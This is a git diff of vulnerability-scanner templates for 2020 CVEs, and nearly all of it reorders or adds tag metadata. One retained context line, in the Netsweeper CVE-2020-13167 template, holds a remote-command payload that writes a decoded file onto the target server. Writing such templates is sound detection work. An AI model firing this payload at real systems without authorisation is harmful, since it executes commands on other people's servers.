--- a/http/cves/2020/CVE-2020-13167.yaml
+++ b/http/cves/2020/CVE-2020-13167.yaml
@@ -26,7 +26,7 @@ info:
max-request: 2
vendor: netsweeper
product: netsweeper
- tags: cve,cve2020,netsweeper,rce,python,webadmin
+ tags: cve2020,cve,netsweeper,rce,python,webadmin
variables:
rand_str: "{{randstr}}"
cmd: 'echo "{{base64(rand_str)}}" | base64 -d > /usr/local/netsweeper/webadmin/out'
diff --git a/http/cves/2020/CVE-2020-13379.yaml b/http/cves/2020/CVE-2020-13379.yaml
index 6004334d7c..7d3471dbc1 100644
--- a/http/cves/2020/CVE-2020-13379.yaml
+++ b/http/cves/2020/CVE-2020-13379.yaml
@@ -29,7 +29,7 @@ info:
vendor: grafana
product: grafana
shodan-query: title:"Grafana"
- tags: cve,cve2020,grafana,ssrf
+ tags: cve2020,cve,grafana,ssrf
http:
- method: GET
diff --git a/http/cves/2020/CVE-2020-13483.yaml b/http/cves/2020/CVE-2020-13483.yaml
index 12c4740758..bc85406de3 100644
--- a/http/cves/2020/CVE-2020-13483.yaml
+++ b/http/cves/2020/CVE-2020-13483.yaml
@@ -25,7 +25,7 @@ info:
max-request: 2
vendor: bitrix24
product: bitrix24
- tags: cve,cve2020,xss,bitrix,bitrix24
+ tags: cve2020,cve,xss,bitrix,bitrix24
http:
- method: GET
diff --git a/http/cves/2020/CVE-2020-13820.yaml b/http/cves/2020/CVE-2020-13820.yaml
index 7b4e9f4a4e..aaefd7b5bc 100644
--- a/http/cves/2020/CVE-2020-13820.yaml
+++ b/http/cves/2020/CVE-2020-13820.yaml
@@ -30,7 +30,7 @@ info:
vendor: extremenetworks
product: extreme_management_center
shodan-query: title:"Extreme Management Center"
- tags: cve,cve2020,xss,extremenetworks
+ tags: cve2020,cve,xss,extremenetworks
http:
- method: GET
diff --git a/http/cves/2020/CVE-2020-13851.yaml b/http/cves/2020/CVE-2020-13851.yaml
index 4db56f0826..eaeaa82186 100644
--- a/http/cves/2020/CVE-2020-13851.yaml
+++ b/http/cves/2020/CVE-2020-13851.yaml
@@ -24,7 +24,7 @@ info:
vendor: pandorafms
product: pandora_fms
shodan-query: title:"Pandora FMS"
- tags: packetstorm,cve,cve2020,rce,pandora,unauth,artica,pandorafms
+ tags: cve2020,cve,packetstorm,rce,pandora,unauth,artica,pandorafms
http:
- raw:
diff --git a/http/cves/2020/CVE-2020-13927.yaml b/http/cves/2020/CVE-2020-13927.yaml
index 2443529dfc..79c1fbf1ab 100644
--- a/http/cves/2020/CVE-2020-13927.yaml
+++ b/http/cves/2020/CVE-2020-13927.yaml
@@ -30,7 +30,7 @@ info:
vendor: apache
product: airflow
shodan-query: title:"Airflow - DAGs" || http.html:"Apache Airflow"
- tags: packetstorm,cve,cve2020,apache,airflow,unauth,auth-bypass,kev
+ tags: cve2020,cve,packetstorm,apache,airflow,unauth,auth-bypass,kev
http:
- method: GET
diff --git a/http/cves/2020/CVE-2020-13945.yaml b/http/cves/2020/CVE-2020-13945.yaml
index 5abb02b0f0..f18ff2ec1b 100644
--- a/http/cves/2020/CVE-2020-13945.yaml
+++ b/http/cves/2020/CVE-2020-13945.yaml
@@ -26,7 +26,7 @@ info:
max-request: 2
vendor: apache
product: apisix
- tags: intrusive,vulhub,packetstorm,cve,cve2020,apache,apisix
+ tags: cve2020,cve,intrusive,vulhub,packetstorm,apache,apisix
http:
- raw:
diff --git a/http/cves/2020/CVE-2020-14092.yaml b/http/cves/2020/CVE-2020-14092.yaml
index dc06773b20..a58b69303b 100644
--- a/http/cves/2020/CVE-2020-14092.yaml
+++ b/http/cves/2020/CVE-2020-14092.yaml
@@ -28,7 +28,7 @@ info:
vendor: ithemes
product: paypal_pro
framework: wordpress
- tags: wp-plugin,sqli,paypal,wpscan,cve,cve2020,wordpress,ithemes
+ tags: cve,cve2020,wp-plugin,sqli,paypal,wpscan,wordpress,ithemes
http:
- method: GET
diff --git a/http/cves/2020/CVE-2020-14144.yaml b/http/cves/2020/CVE-2020-14144.yaml
index b1abae80ea..bd07f857cb 100644
--- a/http/cves/2020/CVE-2020-14144.yaml
+++ b/http/cves/2020/CVE-2020-14144.yaml
@@ -29,7 +29,7 @@ info:
vendor: gitea
product: gitea
shodan-query: html:"Powered by Gitea Version"
- tags: cve,cve2020,rce,gitea,authenticated,git,intrusive
+ tags: cve2020,cve,rce,gitea,authenticated,git,intrusive
http:
- raw:
diff --git a/http/cves/2020/CVE-2020-14408.yaml b/http/cves/2020/CVE-2020-14408.yaml
index 776d81bf97..6b6d120e4d 100644
--- a/http/cves/2020/CVE-2020-14408.yaml
+++ b/http/cves/2020/CVE-2020-14408.yaml
@@ -25,7 +25,7 @@ info:
max-request: 1
vendor: agentejo
product: cockpit
- tags: cve,cve2020,cockpit,agentejo,xss,oss
+ tags: cve2020,cve,cockpit,agentejo,xss,oss
http:
- method: GET
diff --git a/http/cves/2020/CVE-2020-14750.yaml b/http/cves/2020/CVE-2020-14750.yaml
index 0468048928..8579aa5ce6 100644
--- a/http/cves/2020/CVE-2020-14750.yaml
+++ b/http/cves/2020/CVE-2020-14750.yaml
@@ -29,7 +29,7 @@ info:
vendor: oracle
product: fusion_middleware
shodan-query: http.html:"Weblogic Application Server"
- tags: cve,cve2020,rce,oracle,weblogic,unauth,kev,packetstorm
+ tags: cve2020,cve,rce,oracle,weblogic,unauth,kev,packetstorm
http:
- raw:
diff --git a/http/cves/2020/CVE-2020-14882.yaml b/http/cves/2020/CVE-2020-14882.yaml
index 4f45e92bf0..d0a73b22ec 100644
--- a/http/cves/2020/CVE-2020-14882.yaml
+++ b/http/cves/2020/CVE-2020-14882.yaml
@@ -27,7 +27,7 @@ info:
max-request: 1
vendor: oracle
product: weblogic_server
- tags: cve,cve2020,oracle,rce,weblogic,oast,kev
+ tags: cve2020,cve,oracle,rce,weblogic,oast,kev
http:
- method: GET
diff --git a/http/cves/2020/CVE-2020-14883.yaml b/http/cves/2020/CVE-2020-14883.yaml
index 26537f6002..53b11b3368 100644
--- a/http/cves/2020/CVE-2020-14883.yaml
+++ b/http/cves/2020/CVE-2020-14883.yaml
@@ -28,7 +28,7 @@ info:
vendor: oracle
product: weblogic_server
shodan-query: title:"Oracle PeopleSoft Sign-in"
- tags: oracle,rce,weblogic,kev,packetstorm,cve,cve2020
+ tags: cve,cve2020,oracle,rce,weblogic,kev,packetstorm
variables:
str: "{{randstr}}"
revstr: "{{reverse(str)}}"
diff --git a/http/cves/2020/CVE-2020-15050.yaml b/http/cves/2020/CVE-2020-15050.yaml
index be39f5d2a4..5017ff2689 100644
--- a/http/cves/2020/CVE-2020-15050.yaml
+++ b/http/cves/2020/CVE-2020-15050.yaml
@@ -25,7 +25,7 @@ info:
max-request: 1
vendor: supremainc
product: biostar_2
- tags: suprema,biostar2,packetstorm,cve,cve2020,lfi,supremainc
+ tags: cve,cve2020,suprema,biostar2,packetstorm,lfi,supremainc
http:
- method: GET
diff --git a/http/cves/2020/CVE-2020-15227.yaml b/http/cves/2020/CVE-2020-15227.yaml
index bb69ab6732..0b7dc6700d 100644
--- a/http/cves/2020/CVE-2020-15227.yaml
+++ b/http/cves/2020/CVE-2020-15227.yaml
@@ -27,7 +27,7 @@ info:
max-request: 1
vendor: nette
product: application
- tags: cve,cve2020,nette,rce
+ tags: cve2020,cve,nette,rce
http:
- method: GET
diff --git a/http/cves/2020/CVE-2020-15568.yaml b/http/cves/2020/CVE-2020-15568.yaml
index a48859f9d5..73f85db3b1 100644
--- a/http/cves/2020/CVE-2020-15568.yaml
+++ b/http/cves/2020/CVE-2020-15568.yaml
@@ -25,7 +25,7 @@ info:
max-request: 2
vendor: terra-master
product: tos
- tags: cve,cve2020,terramaster,rce,terra-master
+ tags: cve2020,cve,terramaster,rce,terra-master
variables:
filename: "{{to_lower(rand_text_alpha(4))}}"
diff --git a/http/cves/2020/CVE-2020-15895.yaml b/http/cves/2020/CVE-2020-15895.yaml
index 932e7922b9..ca0a265bf7 100644
--- a/http/cves/2020/CVE-2020-15895.yaml
+++ b/http/cves/2020/CVE-2020-15895.yaml
@@ -27,7 +27,7 @@ info:
vendor: dlink
product: dir-816l_firmware
shodan-query: html:"DIR-816L"
- tags: cve,cve2020,dlink,xss
+ tags: cve2020,cve,dlink,xss
http:
- method: GET
diff --git a/http/cves/2020/CVE-2020-15920.yaml b/http/cves/2020/CVE-2020-15920.yaml
index 7466a9f84a..83e58af49d 100644
--- a/http/cves/2020/CVE-2020-15920.yaml
+++ b/http/cves/2020/CVE-2020-15920.yaml
@@ -26,7 +26,7 @@ info:
max-request: 1
vendor: midasolutions
product: eframework
- tags: cve,cve2020,mida,rce,packetstorm,midasolutions
+ tags: cve2020,cve,mida,rce,packetstorm,midasolutions
http:
- method: POST
diff --git a/http/cves/2020/CVE-2020-16846.yaml b/http/cves/2020/CVE-2020-16846.yaml
index c050619fc4..daf8441b85 100644
--- a/http/cves/2020/CVE-2020-16846.yaml
+++ b/http/cves/2020/CVE-2020-16846.yaml
@@ -26,7 +26,7 @@ info:
max-request: 1
vendor: saltstack
product: salt
- tags: vulhub,cve,cve2020,saltstack,kev
+ tags: cve2020,cve,vulhub,saltstack,kev
variables:
priv: "{{to_lower(rand_text_alpha(5))}}"
roaster: "{{to_lower(rand_text_alpha(6))}}"
diff --git a/http/cves/2020/CVE-2020-16952.yaml b/http/cves/2020/CVE-2020-16952.yaml
index fcbf43f445..676b497dd8 100644
--- a/http/cves/2020/CVE-2020-16952.yaml
+++ b/http/cves/2020/CVE-2020-16952.yaml
@@ -26,7 +26,7 @@ info:
max-request: 1
vendor: microsoft
product: sharepoint_enterprise_server
- tags: msf,cve,cve2020,sharepoint,iis,microsoft,ssi,rce
+ tags: cve,cve2020,msf,sharepoint,iis,microsoft,ssi,rce
http:
- method: GET
diff --git a/http/cves/2020/CVE-2020-17362.yaml b/http/cves/2020/CVE-2020-17362.yaml
index db411da39c..6abb14d0f0 100644
--- a/http/cves/2020/CVE-2020-17362.yaml
+++ b/http/cves/2020/CVE-2020-17362.yaml
@@ -26,7 +26,7 @@ info:
vendor: themeinprogress
product: nova_lite
framework: wordpress
- tags: wordpress,xss,wp-plugin,wpscan,cve,cve2020,unauth,themeinprogress
+ tags: cve2020,cve,wordpress,xss,wp-plugin,wpscan,unauth,themeinprogress
http:
- method: GET
diff --git a/http/cves/2020/CVE-2020-17453.yaml b/http/cves/2020/CVE-2020-17453.yaml
index da384e2211..3520e30714 100644
--- a/http/cves/2020/CVE-2020-17453.yaml
+++ b/http/cves/2020/CVE-2020-17453.yaml
@@ -25,7 +25,7 @@ info:
max-request: 1
vendor: wso2
product: api_manager
- tags: xss,wso2,cve2020,cve
+ tags: cve2020,cve,xss,wso2
http:
- method: GET
diff --git a/http/cves/2020/CVE-2020-17456.yaml b/http/cves/2020/CVE-2020-17456.yaml
index 0243dfa10d..debe6446af 100644
--- a/http/cves/2020/CVE-2020-17456.yaml
+++ b/http/cves/2020/CVE-2020-17456.yaml
@@ -27,7 +27,7 @@ info:
max-request: 2
vendor: seowonintech
product: slc-130_firmware
- tags: seowon,cve2020,oast,packetstorm,rce,router,unauth,iot,cve,seowonintech
+ tags: cve,cve2020,seowon,oast,packetstorm,rce,router,unauth,iot,seowonintech
variables:
useragent: '{{rand_base(6)}}'
diff --git a/http/cves/2020/CVE-2020-17463.yaml b/http/cves/2020/CVE-2020-17463.yaml
index d1d234724b..03151aa6c2 100644
--- a/http/cves/2020/CVE-2020-17463.yaml
+++ b/http/cves/2020/CVE-2020-17463.yaml
@@ -29,7 +29,7 @@ info:
vendor: thedaylightstudio
product: fuel_cms
shodan-query: http.title:"fuel cms"
- tags: packetstorm,cve,cve2020,sqli,fuel-cms,kev,thedaylightstudio
+ tags: cve,cve2020,packetstorm,sqli,fuel-cms,kev,thedaylightstudio
http:
- raw:
diff --git a/http/cves/2020/CVE-2020-17496.yaml b/http/cves/2020/CVE-2020-17496.yaml
index 23dd977a5b..c2b01790e1 100644
--- a/http/cves/2020/CVE-2020-17496.yaml
+++ b/http/cves/2020/CVE-2020-17496.yaml
@@ -27,7 +27,7 @@ info:
max-request: 1
vendor: vbulletin
product: vbulletin
- tags: vbulletin,rce,kev,tenable,seclists,cve,cve2020
+ tags: cve2020,cve,vbulletin,rce,kev,tenable,seclists
http:
- raw:
diff --git a/http/cves/2020/CVE-2020-17505.yaml b/http/cves/2020/CVE-2020-17505.yaml
index a1b6abd216..163e47294f 100644
--- a/http/cves/2020/CVE-2020-17505.yaml
+++ b/http/cves/2020/CVE-2020-17505.yaml
@@ -25,7 +25,7 @@ info:
max-request: 2
vendor: articatech
product: web_proxy
- tags: proxy,packetstorm,cve,cve2020,rce,artica,articatech
+ tags: cve,cve2020,proxy,packetstorm,rce,artica,articatech
http:
- raw:
diff --git a/http/cves/2020/CVE-2020-17506.yaml b/http/cves/2020/CVE-2020-17506.yaml
index 959b7f1130..03d199abfe 100644
--- a/http/cves/2020/CVE-2020-17506.yaml
+++ b/http/cves/2020/CVE-2020-17506.yaml
@@ -25,7 +25,7 @@ info:
max-request: 1
vendor: articatech
product: web_proxy
- tags: cve,cve2020,artica,proxy,packetstorm,articatech
+ tags: cve,cve2020,artica,proxy,packetstorm,articatech,sqli
http:
- method: GET
diff --git a/http/cves/2020/CVE-2020-17518.yaml b/http/cves/2020/CVE-2020-17518.yaml
index 02f6b05917..e5f5c77bac 100644
--- a/http/cves/2020/CVE-2020-17518.yaml
+++ b/http/cves/2020/CVE-2020-17518.yaml
@@ -28,7 +28,7 @@ info:
max-request: 2
vendor: apache
product: flink
- tags: lfi,flink,fileupload,vulhub,cve,cve2020,apache,intrusive
+ tags: cve2020,cve,lfi,flink,fileupload,vulhub,apache,intrusive
http:
- raw:
diff --git a/http/cves/2020/CVE-2020-19282.yaml b/http/cves/2020/CVE-2020-19282.yaml
index 93c766d29b..57ca6261e7 100644
--- a/http/cves/2020/CVE-2020-19282.yaml
+++ b/http/cves/2020/CVE-2020-19282.yaml
@@ -25,7 +25,7 @@ info:
max-request: 1
vendor: jeesns
product: jeesns
- tags: cve,cve2020,jeesns,xss
+ tags: cve2020,cve,jeesns,xss
http:
- method: GET
diff --git a/http/cves/2020/CVE-2020-19360.yaml b/http/cves/2020/CVE-2020-19360.yaml
index f5606ddc9d..28fa5f46d7 100644
--- a/http/cves/2020/CVE-2020-19360.yaml
+++ b/http/cves/2020/CVE-2020-19360.yaml
@@ -26,7 +26,7 @@ info:
max-request: 1
vendor: fhem
product: fhem
- tags: fhem,lfi,cve,cve2020
+ tags: cve,cve2020,fhem,lfi
http:
- method: GET
diff --git a/http/cves/2020/CVE-2020-1943.yaml b/http/cves/2020/CVE-2020-1943.yaml
index 45788cf50c..d06e0e76de 100644
--- a/http/cves/2020/CVE-2020-1943.yaml
+++ b/http/cves/2020/CVE-2020-1943.yaml
@@ -27,7 +27,7 @@ info:
max-request: 1
vendor: apache
product: ofbiz
- tags: cve,cve2020,apache,xss,ofbiz
+ tags: cve2020,cve,apache,xss,ofbiz
http:
- method: GET
diff --git a/http/cves/2020/CVE-2020-19515.yaml b/http/cves/2020/CVE-2020-19515.yaml
index 34ef5d4184..8c27fdac0a 100644
--- a/http/cves/2020/CVE-2020-19515.yaml
+++ b/http/cves/2020/CVE-2020-19515.yaml
@@ -28,7 +28,7 @@ info:
vendor: qdpm
product: qdpm
shodan-query: http.favicon.hash:762074255
- tags: cve,cve2020,xss,qdpm,unauth
+ tags: cve2020,cve,xss,qdpm,unauth
http:
- method: GET
diff --git a/http/cves/2020/CVE-2020-19625.yaml b/http/cves/2020/CVE-2020-19625.yaml
index f51eb1c498..023e79a0c1 100644
--- a/http/cves/2020/CVE-2020-19625.yaml
+++ b/http/cves/2020/CVE-2020-19625.yaml
@@ -25,7 +25,7 @@ info:
max-request: 1
vendor: gridx_project
product: gridx
- tags: cve,cve2020,gridx,rce,gridx_project
+ tags: cve2020,cve,gridx,rce,gridx_project
http:
- method: GET
diff --git a/http/cves/2020/CVE-2020-20285.yaml b/http/cves/2020/CVE-2020-20285.yaml
index 2129c10239..72c4961fbe 100644
--- a/http/cves/2020/CVE-2020-20285.yaml
+++ b/http/cves/2020/CVE-2020-20285.yaml
@@ -27,7 +27,7 @@ info:
vendor: zzcms
product: zzcms
fofa-query: zzcms
- tags: cve,cve2020,zzcms,xss
+ tags: cve2020,cve,zzcms,xss
http:
- raw:
diff --git a/http/cves/2020/CVE-2020-20300.yaml b/http/cves/2020/CVE-2020-20300.yaml
index 68105c02fc..ac62a19caa 100644
--- a/http/cves/2020/CVE-2020-20300.yaml
+++ b/http/cves/2020/CVE-2020-20300.yaml
@@ -27,7 +27,7 @@ info:
vendor: weiphp
product: weiphp
shodan-query: http.html:"WeiPHP5.0"
- tags: weiphp,sql
+ tags: cve,cve2020,weiphp,sql,sqli
http:
- method: POST
diff --git a/http/cves/2020/CVE-2020-2036.yaml b/http/cves/2020/CVE-2020-2036.yaml
index 78b3720fe2..284aab070c 100644
--- a/http/cves/2020/CVE-2020-2036.yaml
+++ b/http/cves/2020/CVE-2020-2036.yaml
@@ -26,7 +26,7 @@ info:
max-request: 3
vendor: paloaltonetworks
product: pan-os
- tags: cve,cve2020,vpn,xss,paloaltonetworks
+ tags: cve2020,cve,vpn,xss,paloaltonetworks
http:
- raw:
diff --git a/http/cves/2020/CVE-2020-2096.yaml b/http/cves/2020/CVE-2020-2096.yaml
index 0f735c9b61..3dd77c076d 100644
--- a/http/cves/2020/CVE-2020-2096.yaml
+++ b/http/cves/2020/CVE-2020-2096.yaml
@@ -28,7 +28,7 @@ info:
product: gitlab_hook
framework: jenkins
shodan-query: http.title:"GitLab"
- tags: jenkins,xss,gitlab,plugin,packetstorm,cve,cve2020
+ tags: cve2020,cve,jenkins,xss,gitlab,plugin,packetstorm
http:
- method: GET
diff --git a/http/cves/2020/CVE-2020-20982.yaml b/http/cves/2020/CVE-2020-20982.yaml
index 3dbe0193b0..18c0e0d210 100644
--- a/http/cves/2020/CVE-2020-20982.yaml
+++ b/http/cves/2020/CVE-2020-20982.yaml
@@ -25,7 +25,7 @@ info:
max-request: 1
vendor: wdja
product: wdja_cms
- tags: cve,cve2020,xss,wdja,shadoweb
+ tags: cve2020,cve,xss,wdja,shadoweb
http:
- method: GET
diff --git a/http/cves/2020/CVE-2020-20988.yaml b/http/cves/2020/CVE-2020-20988.yaml
index 21dcbd05d6..b57929ebde 100644
--- a/http/cves/2020/CVE-2020-20988.yaml
+++ b/http/cves/2020/CVE-2020-20988.yaml
@@ -26,7 +26,7 @@ info:
max-request: 2
vendor: domainmod
product: domainmod
- tags: cve,cve2020,domainmod,xss,authenticated
+ tags: cve2020,cve,domainmod,xss,authenticated
http:
- raw:
diff --git a/http/cves/2020/CVE-2020-21224.yaml b/http/cves/2020/CVE-2020-21224.yaml
index d34a97520f..65710b8316 100644
--- a/http/cves/2020/CVE-2020-21224.yaml
+++ b/http/cves/2020/CVE-2020-21224.yaml
@@ -25,7 +25,7 @@ info:
max-request: 1
vendor: inspur
product: clusterengine
- tags: cve,cve2020,clusterengine,rce,inspur
+ tags: cve2020,cve,clusterengine,rce,inspur
http:
- method: POST
diff --git a/http/cves/2020/CVE-2020-22208.yaml b/http/cves/2020/CVE-2020-22208.yaml
index f92c8477ab..67f55fa640 100644
--- a/http/cves/2020/CVE-2020-22208.yaml
+++ b/http/cves/2020/CVE-2020-22208.yaml
@@ -27,7 +27,7 @@ info:
product: 74cms
shodan-query: http.html:"74cms"
fofa-query: app="74cms"
- tags: cve,cve2020,74cms,sqli
+ tags: cve2020,cve,74cms,sqli
variables:
num: "999999999"
diff --git a/http/cves/2020/CVE-2020-22840.yaml b/http/cves/2020/CVE-2020-22840.yaml
index 6c444d5e7a..9ade88cdf5 100644
--- a/http/cves/2020/CVE-2020-22840.yaml
+++ b/http/cves/2020/CVE-2020-22840.yaml
@@ -26,7 +26,7 @@ info:
max-request: 1
vendor: b2evolution
product: b2evolution
- tags: packetstorm,edb,cve,cve2020,redirect,b2evolution
+ tags: cve,cve2020,packetstorm,edb,redirect,b2evolution
http:
- method: GET
diff --git a/http/cves/2020/CVE-2020-23015.yaml b/http/cves/2020/CVE-2020-23015.yaml
index 81ab239d04..c083e0883e 100644
--- a/http/cves/2020/CVE-2020-23015.yaml
+++ b/http/cves/2020/CVE-2020-23015.yaml
@@ -24,7 +24,7 @@ info:
max-request: 1
vendor: opnsense
product: opnsense
- tags: cve,cve2020,redirect,opnsense
+ tags: cve2020,cve,redirect,opnsense
http:
- method: GET
diff --git a/http/cves/2020/CVE-2020-23575.yaml b/http/cves/2020/CVE-2020-23575.yaml
index baee6c1117..0c059058a1 100644
--- a/http/cves/2020/CVE-2020-23575.yaml
+++ b/http/cves/2020/CVE-2020-23575.yaml
@@ -25,7 +25,7 @@ info:
max-request: 1
vendor: kyocera
product: d-copia253mf_plus_firmware
- tags: cve,cve2020,printer,iot,lfi,edb,kyocera
+ tags: cve2020,cve,printer,iot,lfi,edb,kyocera
http:
- method: GET
diff --git a/http/cves/2020/CVE-2020-23972.yaml b/http/cves/2020/CVE-2020-23972.yaml
index 5df1b2e07d..f2080f982c 100644
--- a/http/cves/2020/CVE-2020-23972.yaml
+++ b/http/cves/2020/CVE-2020-23972.yaml
@@ -29,7 +29,7 @@ info:
vendor: gmapfp
product: gmapfp
framework: joomla\!
- tags: cve,cve2020,joomla,edb,packetstorm,fileupload,intrusive,gmapfp,joomla\!
+ tags: cve2020,cve,joomla,edb,packetstorm,fileupload,intrusive,gmapfp,joomla\!
variables:
name: "{{to_lower(rand_text_alpha(5))}}"
diff --git a/http/cves/2020/CVE-2020-24148.yaml b/http/cves/2020/CVE-2020-24148.yaml
index e29321f356..6ca2244a89 100644
--- a/http/cves/2020/CVE-2020-24148.yaml
+++ b/http/cves/2020/CVE-2020-24148.yaml
@@ -30,8 +30,6 @@ info:
fofa-query: body="import-xml-feed"
tags: cve,cve2020,wordpress,wp-plugin,ssrf,mooveagency
-flow: http(1) && http(2)
-
http:
- raw:
- |
diff --git a/http/cves/2020/CVE-2020-24186.yaml b/http/cves/2020/CVE-2020-24186.yaml
index 72169167f8..53a331fbba 100644
--- a/http/cves/2020/CVE-2020-24186.yaml
+++ b/http/cves/2020/CVE-2020-24186.yaml
@@ -27,7 +27,7 @@ info:
vendor: gvectors
product: wpdiscuz
framework: wordpress
- tags: rce,fileupload,packetstorm,cve,cve2020,wordpress,wp-plugin,intrusive,gvectors
+ tags: cve,cve2020,rce,fileupload,packetstorm,wordpress,wp-plugin,intrusive,gvectors
http:
- raw:
diff --git a/http/cves/2020/CVE-2020-24223.yaml b/http/cves/2020/CVE-2020-24223.yaml
index 55b15281d5..53d937ae9d 100644
--- a/http/cves/2020/CVE-2020-24223.yaml
+++ b/http/cves/2020/CVE-2020-24223.yaml
@@ -26,7 +26,7 @@ info:
max-request: 1
vendor: mara_cms_project
product: mara_cms
- tags: cve,cve2020,mara,xss,edb,mara_cms_project
+ tags: cve2020,cve,mara,xss,edb,mara_cms_project
http:
- method: GET
diff --git a/http/cves/2020/CVE-2020-24589.yaml b/http/cves/2020/CVE-2020-24589.yaml
index bf41ae66fe..32cb381290 100644
--- a/http/cves/2020/CVE-2020-24589.yaml
+++ b/http/cves/2020/CVE-2020-24589.yaml
@@ -24,7 +24,7 @@ info:
max-request: 1
vendor: wso2
product: api_manager
- tags: cve,cve2020,wso2,xxe,oast,blind
+ tags: cve2020,cve,wso2,xxe,oast,blind
http:
- raw:
diff --git a/http/cves/2020/CVE-2020-24701.yaml b/http/cves/2020/CVE-2020-24701.yaml
index 6a46570590..b3d0176eda 100644
--- a/http/cves/2020/CVE-2020-24701.yaml
+++ b/http/cves/2020/CVE-2020-24701.yaml
@@ -25,7 +25,7 @@ info:
vendor: open-xchange
product: open-xchange_appsuite
shodan-query: html:"Appsuite"
- tags: packetstorm,seclists,cve,cve2020,appsuite,xss,open-xchange
+ tags: cve,cve2020,packetstorm,seclists,appsuite,xss,open-xchange
http:
- method: GET
diff --git a/http/cves/2020/CVE-2020-24912.yaml b/http/cves/2020/CVE-2020-24912.yaml
index 9d17bf40a5..a48c4afc53 100644
--- a/http/cves/2020/CVE-2020-24912.yaml
+++ b/http/cves/2020/CVE-2020-24912.yaml
@@ -27,7 +27,7 @@ info:
max-request: 3
vendor: qcubed
product: qcubed
- tags: cve,cve2020,qcubed,xss,seclists
+ tags: cve2020,cve,qcubed,xss,seclists
http:
- method: POST
diff --git a/http/cves/2020/CVE-2020-24949.yaml b/http/cves/2020/CVE-2020-24949.yaml
index e47a8817d5..abdf60db86 100644
--- a/http/cves/2020/CVE-2020-24949.yaml
+++ b/http/cves/2020/CVE-2020-24949.yaml
@@ -26,7 +26,7 @@ info:
max-request: 1
vendor: php-fusion
product: php-fusion
- tags: rce,php,packetstorm,cve,cve2020,phpfusion,php-fusion
+ tags: cve,cve2020,rce,php,packetstorm,phpfusion,php-fusion
http:
- method: GET
diff --git a/http/cves/2020/CVE-2020-25213.yaml b/http/cves/2020/CVE-2020-25213.yaml
index ef8a71c607..6e99291514 100644
--- a/http/cves/2020/CVE-2020-25213.yaml
+++ b/http/cves/2020/CVE-2020-25213.yaml
@@ -30,7 +30,7 @@ info:
vendor: webdesi9
product: file_manager
framework: wordpress
- tags: wordpress,rce,kev,fileupload,intrusive,packetstorm,cve,cve2020,webdesi9
+ tags: cve,cve2020,wordpress,rce,kev,fileupload,intrusive,packetstorm,webdesi9
http:
- raw:
diff --git a/http/cves/2020/CVE-2020-25495.yaml b/http/cves/2020/CVE-2020-25495.yaml
index 4b178352c7..c35ea91fe3 100644
--- a/http/cves/2020/CVE-2020-25495.yaml
+++ b/http/cves/2020/CVE-2020-25495.yaml
@@ -26,7 +26,7 @@ info:
max-request: 1
vendor: xinuos
product: openserver
- tags: cve,cve2020,sco,xss,edb,packetstorm,intrusive,xinuos
+ tags: cve2020,cve,sco,xss,edb,packetstorm,intrusive,xinuos
http:
- method: GET
diff --git a/http/cves/2020/CVE-2020-2551.yaml b/http/cves/2020/CVE-2020-2551.yaml
index 0345b53a4d..9bd6988195 100644
--- a/http/cves/2020/CVE-2020-2551.yaml
+++ b/http/cves/2020/CVE-2020-2551.yaml
@@ -25,7 +25,7 @@ info:
max-request: 1
vendor: oracle
product: weblogic_server
- tags: cve,cve2020,oracle,weblogic,rce,unauth,kev
+ tags: cve2020,cve,oracle,weblogic,rce,unauth,kev
http:
- method: GET
diff --git a/http/cves/2020/CVE-2020-25540.yaml b/http/cves/2020/CVE-2020-25540.yaml
index e74179974f..506ab6de0a 100644
--- a/http/cves/2020/CVE-2020-25540.yaml
+++ b/http/cves/2020/CVE-2020-25540.yaml
@@ -27,7 +27,7 @@ info:
max-request: 1
vendor: thinkadmin
product: thinkadmin
- tags: thinkadmin,lfi,edb,packetstorm,cve,cve2020,ctolog
+ tags: cve,cve2020,thinkadmin,lfi,edb,packetstorm,ctolog
http:
- method: GET
diff --git a/http/cves/2020/CVE-2020-26153.yaml b/http/cves/2020/CVE-2020-26153.yaml
index c8bfac028f..fc2ee52340 100644
--- a/http/cves/2020/CVE-2020-26153.yaml
+++ b/http/cves/2020/CVE-2020-26153.yaml
@@ -27,7 +27,7 @@ info:
vendor: eventespresso
product: event_espresso
framework: wordpress
- tags: cve,cve2020,xss,wordpress,wp-plugin,eventespresso
+ tags: cve2020,cve,xss,wordpress,wp-plugin,eventespresso
http:
- method: GET
diff --git a/http/cves/2020/CVE-2020-26248.yaml b/http/cves/2020/CVE-2020-26248.yaml
index 7963860e49..c973ddbafb 100644
--- a/http/cves/2020/CVE-2020-26248.yaml
+++ b/http/cves/2020/CVE-2020-26248.yaml
@@ -29,7 +29,7 @@ info:
vendor: prestashop
product: productcomments
framework: prestashop
- tags: packetstorm,cve,cve2020,sqli,prestshop,prestashop
+ tags: cve,cve2020,packetstorm,sqli,prestshop,prestashop
http:
- raw:
diff --git a/http/cves/2020/CVE-2020-26413.yaml b/http/cves/2020/CVE-2020-26413.yaml
index f8fce4ad5c..a20e30c02f 100644
--- a/http/cves/2020/CVE-2020-26413.yaml
+++ b/http/cves/2020/CVE-2020-26413.yaml
@@ -27,7 +27,7 @@ info:
vendor: gitlab
product: gitlab
shodan-query: http.title:"GitLab"
- tags: hackerone,cve,cve2020,gitlab,exposure,enum,graphql
+ tags: cve,cve2020,hackerone,gitlab,exposure,enum,graphql
http:
- raw:
diff --git a/http/cves/2020/CVE-2020-26948.yaml b/http/cves/2020/CVE-2020-26948.yaml
index ff555fe689..a7a3ae4e53 100644
--- a/http/cves/2020/CVE-2020-26948.yaml
+++ b/http/cves/2020/CVE-2020-26948.yaml
@@ -25,7 +25,7 @@ info:
max-request: 1
vendor: emby
product: emby
- tags: cve,cve2020,emby,jellyfin,ssrf
+ tags: cve2020,cve,emby,jellyfin,ssrf
http:
- method: GET
diff --git a/http/cves/2020/CVE-2020-27191.yaml b/http/cves/2020/CVE-2020-27191.yaml
index dc9e9ef52c..0d731c8f12 100644
--- a/http/cves/2020/CVE-2020-27191.yaml
+++ b/http/cves/2020/CVE-2020-27191.yaml
@@ -25,7 +25,7 @@ info:
max-request: 1
vendor: lionwiki
product: lionwiki
- tags: cve,cve2020,lionwiki,lfi,oss
+ tags: cve2020,cve,lionwiki,lfi,oss
http:
- method: GET
diff --git a/http/cves/2020/CVE-2020-2733.yaml b/http/cves/2020/CVE-2020-2733.yaml
index 254e368b75..e6f5ef60ff 100644
--- a/http/cves/2020/CVE-2020-2733.yaml
+++ b/http/cves/2020/CVE-2020-2733.yaml
@@ -27,7 +27,7 @@ info:
vendor: oracle
product: jd_edwards_enterpriseone_tools
shodan-query: port:8999 product:"Oracle WebLogic Server"
